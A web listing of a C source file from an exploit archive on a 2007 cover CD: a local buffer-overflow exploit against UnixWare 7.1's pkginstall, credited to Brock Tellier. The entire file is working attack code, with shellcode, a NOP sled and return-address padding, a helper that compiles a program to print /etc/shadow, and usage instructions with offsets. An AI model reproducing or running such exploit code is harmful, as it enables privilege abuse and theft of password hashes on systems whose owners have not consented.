home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / sco / local / uwpkgi.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  90 lines

  1. /**
  2.  ** UnixWare 7.1 /usr/sbin/pkginstall exploit 
  3.  
  4.  ** Prints contents of /etc/shadow (execing shell won't be enough here)
  5.  ** Demonstrates overflow in uw71's gethostbyname() and dacread permissio=
  6. n
  7.  ** problems.  Use offsets of +-100.
  8.  **
  9.  ** Compile cc -o uwpkgi uwpkgi.c
  10.  ** run /usr/sbin/pkginstall -s `./uwpkgi 100`:
  11.  **
  12.  ** Brock Tellier btellier@usa.net
  13.  **/ 
  14.  
  15.  
  16.  
  17. #include <stdlib.h>
  18. #include <stdio.h>
  19.  
  20. char scoshell[] = 
  21.  
  22. "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
  23. "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
  24. "\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
  25.  
  26.                        
  27.  
  28. #define LEN 3500
  29. #define NOP 0x90
  30. #define CODE "void main() { system(\"cat /etc/shadow\"); }\n"
  31.  
  32. void buildpi() {
  33.   FILE *fp;
  34.   char cc[100];
  35.  
  36.   fp = fopen("/tmp/pi.c", "w");
  37.   fprintf(fp, CODE);
  38.   fclose(fp);
  39.   snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");
  40.   system(cc);
  41.  
  42. }
  43.  
  44. int main(int argc, char *argv[]) {
  45.  
  46. long int offset=0;
  47.  
  48. int i;
  49. int buflen = LEN;
  50. long int addr;
  51. char buf[LEN];
  52. buildpi(); 
  53.  
  54.  if(argc > 3) {
  55.   fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
  56.         exit(0); 
  57.  
  58.  }
  59.  else if (argc == 2){
  60.    offset=atoi(argv[1]);
  61.    
  62.  }
  63.  else if (argc == 3) {
  64.   offset=atoi(argv[1]);
  65.   buflen=atoi(argv[2]); =
  66.  
  67.  }
  68.  else {
  69.    offset=100;
  70.    buflen=3000;
  71.  
  72.  }
  73.  
  74. addr=0x8046b75 + offset;
  75.  
  76. fprintf(stderr, "\nUnixWare 7.1 pkginstall exploit prints");
  77. fprintf(stderr, "/etc/shadow\n");
  78. fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
  79. fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
  80.  
  81. memset(buf,NOP,buflen);
  82. memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
  83. for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
  84.         *(int *)&buf[i]=addr;
  85. buf[buflen - 1] = ':';
  86.  
  87. printf(buf);
  88. exit(0);
  89. }
  90.